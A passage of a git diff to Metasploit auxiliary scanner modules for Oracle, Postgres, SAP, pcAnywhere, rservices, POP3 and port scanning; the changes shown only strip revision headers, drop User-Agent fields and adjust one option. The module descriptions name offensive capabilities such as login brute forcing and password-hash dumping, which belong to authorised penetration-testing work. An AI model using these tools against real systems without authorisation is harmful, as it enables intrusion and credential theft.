Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary This module scans NFS mounts and their permissions. }, 'Author' => [''], - 'Version' => '$Revision$', 'References' => [ ['CVE', '1999-0170'], diff --git a/modules/auxiliary/scanner/ntp/ntp_monlist.rb b/modules/auxiliary/scanner/ntp/ntp_monlist.rb index 4df4e02ae1..676b534677 100644 --- a/modules/auxiliary/scanner/ntp/ntp_monlist.rb +++ b/modules/auxiliary/scanner/ntp/ntp_monlist.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'NTP Monitor List Scanner', - 'Version' => '$Revision$', 'Description' => 'Obtain the list of recent clients from an NTP server', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/oracle/emc_sid.rb b/modules/auxiliary/scanner/oracle/emc_sid.rb index 27a4bea0ea..eb1f221ba4 100644 --- a/modules/auxiliary/scanner/oracle/emc_sid.rb +++ b/modules/auxiliary/scanner/oracle/emc_sid.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary This module makes a request to the Oracle Enterprise Manager Control Console in an attempt to discover the SID. }, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf' ], diff --git a/modules/auxiliary/scanner/oracle/isqlplus_login.rb b/modules/auxiliary/scanner/oracle/isqlplus_login.rb index 5abfb3f68c..150d6a5463 100644 --- a/modules/auxiliary/scanner/oracle/isqlplus_login.rb +++ b/modules/auxiliary/scanner/oracle/isqlplus_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Oracle iSQL*Plus Login Utility', - 'Version' => '$Revision$', 'Description' => %q{ This module attempts to authenticate against an Oracle ISQL*Plus administration web site using username and password combinations indicated diff --git a/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb b/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb index e742578162..a4b51ffa92 100644 --- a/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb +++ b/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Oracle isqlplus SID Check', - 'Version' => '$Revision$', 'Description' => %q{ This module attempts to bruteforce the SID on the Oracle application server iSQL*Plus login pages. It does this by testing Oracle error responses returned in the HTTP response. diff --git a/modules/auxiliary/scanner/oracle/oracle_hashdump.rb b/modules/auxiliary/scanner/oracle/oracle_hashdump.rb index ea08ad3445..b11a8bef81 100644 --- a/modules/auxiliary/scanner/oracle/oracle_hashdump.rb +++ b/modules/auxiliary/scanner/oracle/oracle_hashdump.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Oracle Password Hashdump', - 'Version' => '$Revision$', 'Description' => %Q{ This module dumps the usernames and password hashes from Oracle given the proper Credentials and SID. diff --git a/modules/auxiliary/scanner/oracle/oracle_login.rb b/modules/auxiliary/scanner/oracle/oracle_login.rb index 1e804f960e..3869c4c321 100644 --- a/modules/auxiliary/scanner/oracle/oracle_login.rb +++ b/modules/auxiliary/scanner/oracle/oracle_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -37,8 +33,7 @@ class Metasploit3 < Msf::Auxiliary [ 'URL', 'http://www.oracle.com/us/products/database/index.html' ], [ 'CVE', '1999-0502'], # Weak password CVE [ 'URL', 'http://nmap.org/nsedoc/scripts/oracle-brute.html'] - ], - 'Version' => '$Revision$' + ] )) register_options( diff --git a/modules/auxiliary/scanner/oracle/sid_brute.rb b/modules/auxiliary/scanner/oracle/sid_brute.rb index 44940aa7af..2a23ef7a6e 100644 --- a/modules/auxiliary/scanner/oracle/sid_brute.rb +++ b/modules/auxiliary/scanner/oracle/sid_brute.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,8 +25,7 @@ class Metasploit3 < Msf::Auxiliary SIDs read from the named file will be attempted in sequence instead. }, 'Author' => [ 'todb' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options( diff --git a/modules/auxiliary/scanner/oracle/sid_enum.rb b/modules/auxiliary/scanner/oracle/sid_enum.rb index f86c381db4..fb8509adf5 100644 --- a/modules/auxiliary/scanner/oracle/sid_enum.rb +++ b/modules/auxiliary/scanner/oracle/sid_enum.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'CG', 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'DisclosureDate' => 'Jan 7 2009' )) diff --git a/modules/auxiliary/scanner/oracle/spy_sid.rb b/modules/auxiliary/scanner/oracle/spy_sid.rb index b379a05843..5326fc21a2 100644 --- a/modules/auxiliary/scanner/oracle/spy_sid.rb +++ b/modules/auxiliary/scanner/oracle/spy_sid.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary This module makes a request to the Oracle Application Server in an attempt to discover the SID. }, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf' ], diff --git a/modules/auxiliary/scanner/oracle/tnslsnr_version.rb b/modules/auxiliary/scanner/oracle/tnslsnr_version.rb index b67bac6636..e9c6e24622 100644 --- a/modules/auxiliary/scanner/oracle/tnslsnr_version.rb +++ b/modules/auxiliary/scanner/oracle/tnslsnr_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => ['CG'], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'DisclosureDate' => 'Jan 7 2009')) register_options( diff --git a/modules/auxiliary/scanner/oracle/xdb_sid.rb b/modules/auxiliary/scanner/oracle/xdb_sid.rb index 3b4ee0101d..df0ab6d9aa 100644 --- a/modules/auxiliary/scanner/oracle/xdb_sid.rb +++ b/modules/auxiliary/scanner/oracle/xdb_sid.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary This module simply makes a authenticated request to retrieve the sid from the Oracle XML DB httpd server. }, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf' ], diff --git a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb index 6906784798..aa3f7baec7 100644 --- a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb +++ b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary This module attempts to retrieve the sid from the Oracle XML DB httpd server, utilizing Pete Finnigan's default oracle password list. }, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf' ], diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb index 0734bafe48..e89007576c 100644 --- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb +++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'PcAnywhere Login Scanner', - 'Version' => '$Revision$', 'Description' => %q{ This module will test pcAnywhere logins on a range of machines and report successful logins. diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb index 8c39d1dfa4..61a162fd3e 100644 --- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb +++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'PcAnywhere TCP Service Discovery', - 'Version' => '$Revision$', 'Description' => 'Discover active pcAnywhere services through TCP', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb index 0ba7439fdb..76fc5777b8 100644 --- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb +++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'PcAnywhere UDP Service Discovery', - 'Version' => '$Revision$', 'Description' => 'Discover active pcAnywhere services through UDP', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/pop3/pop3_login.rb b/modules/auxiliary/scanner/pop3/pop3_login.rb index c713b64403..e895ba5546 100644 --- a/modules/auxiliary/scanner/pop3/pop3_login.rb +++ b/modules/auxiliary/scanner/pop3/pop3_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary super( 'Name' => 'POP3 Login Utility', 'Description' => 'This module attempts to authenticate to an POP3 service.', - 'Version' => '$Revision$', 'Author' => [ '==[ Alligator Security Team ]==', diff --git a/modules/auxiliary/scanner/pop3/pop3_version.rb b/modules/auxiliary/scanner/pop3/pop3_version.rb index e5eb4386f9..9131397296 100644 --- a/modules/auxiliary/scanner/pop3/pop3_version.rb +++ b/modules/auxiliary/scanner/pop3/pop3_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'POP3 Banner Grabber', - 'Version' => '$Revision$', 'Description' => 'POP3 Banner Grabber', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/portscan/ack.rb b/modules/auxiliary/scanner/portscan/ack.rb index 8025687e7f..ff8c9578c0 100644 --- a/modules/auxiliary/scanner/portscan/ack.rb +++ b/modules/auxiliary/scanner/portscan/ack.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary not in place for them. }, 'Author' => 'kris katterjohn', - 'Version' => '$Revision$', # 03/26/2009 'License' => MSF_LICENSE ) diff --git a/modules/auxiliary/scanner/portscan/ftpbounce.rb b/modules/auxiliary/scanner/portscan/ftpbounce.rb index a06963bc80..a47a8eb7d1 100644 --- a/modules/auxiliary/scanner/portscan/ftpbounce.rb +++ b/modules/auxiliary/scanner/portscan/ftpbounce.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'FTP Bounce Port Scanner', - 'Version' => '$Revision$', 'Description' => %q{ Enumerate TCP services via the FTP bounce PORT/LIST method, which can still come in handy every once in diff --git a/modules/auxiliary/scanner/portscan/syn.rb b/modules/auxiliary/scanner/portscan/syn.rb index cf4d8307b9..8518543da5 100644 --- a/modules/auxiliary/scanner/portscan/syn.rb +++ b/modules/auxiliary/scanner/portscan/syn.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary Enumerate open TCP services using a raw SYN scan. }, 'Author' => 'kris katterjohn', - 'Version' => '$Revision$', # 03/26/2009 'License' => MSF_LICENSE ) diff --git a/modules/auxiliary/scanner/portscan/tcp.rb b/modules/auxiliary/scanner/portscan/tcp.rb index 709ef5c6ee..532e57e21f 100644 --- a/modules/auxiliary/scanner/portscan/tcp.rb +++ b/modules/auxiliary/scanner/portscan/tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'TCP Port Scanner', - 'Version' => '$Revision$', 'Description' => 'Enumerate open TCP services', 'Author' => [ 'hdm', 'kris katterjohn' ], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/portscan/xmas.rb b/modules/auxiliary/scanner/portscan/xmas.rb index fb045eef43..3335c64240 100644 --- a/modules/auxiliary/scanner/portscan/xmas.rb +++ b/modules/auxiliary/scanner/portscan/xmas.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary PSH and URG flags. }, 'Author' => 'kris katterjohn', - 'Version' => '$Revision$', # 04/08/2009 'License' => MSF_LICENSE ) diff --git a/modules/auxiliary/scanner/postgres/postgres_hashdump.rb b/modules/auxiliary/scanner/postgres/postgres_hashdump.rb index 4265640aae..711b782af4 100644 --- a/modules/auxiliary/scanner/postgres/postgres_hashdump.rb +++ b/modules/auxiliary/scanner/postgres/postgres_hashdump.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Postgres Password Hashdump', - 'Version' => '$Revision$', 'Description' => %Q{ This module extracts the usernames and encrypted password hashes from a Postgres server and stores them for later cracking. diff --git a/modules/auxiliary/scanner/postgres/postgres_login.rb b/modules/auxiliary/scanner/postgres/postgres_login.rb index 58d0e643ba..d7cd2c5899 100644 --- a/modules/auxiliary/scanner/postgres/postgres_login.rb +++ b/modules/auxiliary/scanner/postgres/postgres_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,8 +30,7 @@ class Metasploit3 < Msf::Auxiliary [ [ 'URL', 'http://www.postgresql.org' ], [ 'CVE', '1999-0502'] # Weak password - ], - 'Version' => '$Revision$' + ] )) register_options( diff --git a/modules/auxiliary/scanner/postgres/postgres_schemadump.rb b/modules/auxiliary/scanner/postgres/postgres_schemadump.rb index d2e2c5761c..21b0c7e61c 100644 --- a/modules/auxiliary/scanner/postgres/postgres_schemadump.rb +++ b/modules/auxiliary/scanner/postgres/postgres_schemadump.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Postgres Schema Dump', - 'Version' => '$Revision$', 'Description' => %Q{ This module extracts the schema information from a Postgres server. diff --git a/modules/auxiliary/scanner/postgres/postgres_version.rb b/modules/auxiliary/scanner/postgres/postgres_version.rb index 99da31ebf7..c18f3c01a5 100644 --- a/modules/auxiliary/scanner/postgres/postgres_version.rb +++ b/modules/auxiliary/scanner/postgres/postgres_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,8 +26,7 @@ class Metasploit3 < Msf::Auxiliary 'References' => [ [ 'URL', 'http://www.postgresql.org' ] - ], - 'Version' => '$Revision$' # 2009-02-05 + ] )) register_options([ ], self.class) # None needed. diff --git a/modules/auxiliary/scanner/rogue/rogue_recv.rb b/modules/auxiliary/scanner/rogue/rogue_recv.rb index c9f26dc984..93b24e9c84 100644 --- a/modules/auxiliary/scanner/rogue/rogue_recv.rb +++ b/modules/auxiliary/scanner/rogue/rogue_recv.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'hdm', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['URL', 'http://www.metasploit.com/research/projects/rogue_network/'], diff --git a/modules/auxiliary/scanner/rogue/rogue_send.rb b/modules/auxiliary/scanner/rogue/rogue_send.rb index aaa233305a..3e3a54308b 100644 --- a/modules/auxiliary/scanner/rogue/rogue_send.rb +++ b/modules/auxiliary/scanner/rogue/rogue_send.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'hdm', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['URL', 'http://www.metasploit.com/research/projects/rogue_network/'], diff --git a/modules/auxiliary/scanner/rservices/rexec_login.rb b/modules/auxiliary/scanner/rservices/rexec_login.rb index c0a403051b..e4d2aa496b 100644 --- a/modules/auxiliary/scanner/rservices/rexec_login.rb +++ b/modules/auxiliary/scanner/rservices/rexec_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'rexec Authentication Scanner', - 'Version' => '$Revision$', 'Description' => %q{ This module will test an rexec service on a range of machines and report successful logins. diff --git a/modules/auxiliary/scanner/rservices/rlogin_login.rb b/modules/auxiliary/scanner/rservices/rlogin_login.rb index 08a8ce8093..7dfdb9585b 100644 --- a/modules/auxiliary/scanner/rservices/rlogin_login.rb +++ b/modules/auxiliary/scanner/rservices/rlogin_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'rlogin Authentication Scanner', - 'Version' => '$Revision$', 'Description' => %q{ This module will test an rlogin service on a range of machines and report successful logins. diff --git a/modules/auxiliary/scanner/rservices/rsh_login.rb b/modules/auxiliary/scanner/rservices/rsh_login.rb index 78e16992f0..9840d58e36 100644 --- a/modules/auxiliary/scanner/rservices/rsh_login.rb +++ b/modules/auxiliary/scanner/rservices/rsh_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'rsh Authentication Scanner', - 'Version' => '$Revision$', 'Description' => %q{ This module will test a shell (rsh) service on a range of machines and report successful logins. diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb index e936e6bc64..791392766b 100644 --- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb +++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary This module scans for commonly found SAP Internet Communication Manager URLs and outputs return codes for the user. }, - 'Version' => '$Revision$', 'Author' => [ 'Chris John Riley' ], 'References' => [ diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb index 77071e052f..a3af96e649 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'SAP Management Console ABAP syslog', - 'Version' => '$Revision$', 'Description' => %q{ This module simply attempts to extract the ABAP syslog through the SAP Management Console SOAP Interface. }, 'References' => [ @@ -47,8 +42,7 @@ class Metasploit4 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), - 'method' => 'GET', - 'headers' => {'User-Agent' => datastore['UserAgent']} + 'method' => 'GET' }, 25) if not res diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb index 5c69b3554c..42fc8fa45b 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'SAP Management Console Brute Force', - 'Version' => '$Revision$', 'Description' => %q{ This module simply attempts to brute force the username | password for the SAP Management Console SOAP Interface. By @@ -52,11 +47,7 @@ class Metasploit4 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), - 'method' => 'GET', - 'headers' => - { - 'User-Agent' => datastore['UserAgent'] - } + 'method' => 'GET' }, 25) if not res diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb index b13e062236..c653986490 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'SAP Management Console Extract Users', - 'Version' => '$Revision$', 'Description' => %q{ This module simply attempts to extract SAP users from the ABAP Syslog through the SAP Management Console SOAP Interface. @@ -50,12 +45,7 @@ class Metasploit4 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), - 'method' => 'GET', - 'headers' => - { - 'User-Agent' => datastore['UserAgent'] - } - + 'method' => 'GET' }, 25) if not res diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb index f10883a279..5590d96d0f 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'SAP Management Console Get Access Points', - 'Version' => '$Revision$', 'Description' => %q{ This module simply attempts to output a list of SAP access points through the SAP Management Console SOAP Interface. @@ -50,11 +45,7 @@ class Metasploit4 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), - 'method' => 'GET', - 'headers' => - { - 'User-Agent' => datastore['UserAgent'] - } + 'method' => 'GET' }, 25) if not res diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb index a826dd39e0..269bd94a27 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'SAP Management Console getEnvironment', - 'Version' => '$Revision$', 'Description' => %q{ This module simply attempts to identify SAP Environment settings through the SAP Management Console SOAP Interface. @@ -50,11 +45,7 @@ class Metasploit4 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), - 'method' => 'GET', - 'headers' => - { - 'User-Agent' => datastore['UserAgent'] - } + 'method' => 'GET' }, 25) if not res diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb index ca733c40e4..2ef53e8aa4 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb @@ -16,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'SAP Management Console Get Logfile', - 'Version' => '$Revision$', 'Description' => %q{ This module simply attempts to download available logfiles and developer tracefiles through the SAP Management Console SOAP @@ -41,8 +40,8 @@ class Metasploit4 < Msf::Auxiliary Opt::RPORT(50013), OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']), OptString.new('RFILE', [ true, 'The name of the file to download ', 'sapstart.log']), - OptString.new('FILETYPE', [true, 'Specify LOGFILE or TRACEFILE', 'TRACEFILE']), - OptBool.new('GETALL', [ false, 'Download all available files (WARNING: may take long!)', false]), + OptEnum.new('FILETYPE', [true, 'Specify LOGFILE or TRACEFILE', 'TRACEFILE', ['TRACEFILE','LOGFILE']]), + OptBool.new('GETALL', [ false, 'Download all available files (WARNING: may take a long time!)', false]) ], self.class) register_autofilter_ports([ 50013 ]) deregister_options('RHOST') diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb index 817c93bc26..d59c371a8d 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'SAP Management Console Get Process Parameters', - 'Version' => '$Revision$', 'Description' => %q{ This module simply attempts to output a SAP process parameters and configuration settings through the SAP Management Console SOAP Interface. @@ -51,11 +46,7 @@ class Metasploit4 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), - 'method' => 'GET', - 'headers' => - { - 'User-Agent' => datastore['UserAgent'] - } + 'method' => 'GET' }, 25) if not res diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb index 2a5e8b35e0..af99ca752b 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'SAP Management Console Instance Properties', - 'Version' => '$Revision$', 'Description' => %q{ This module simply attempts to identify the 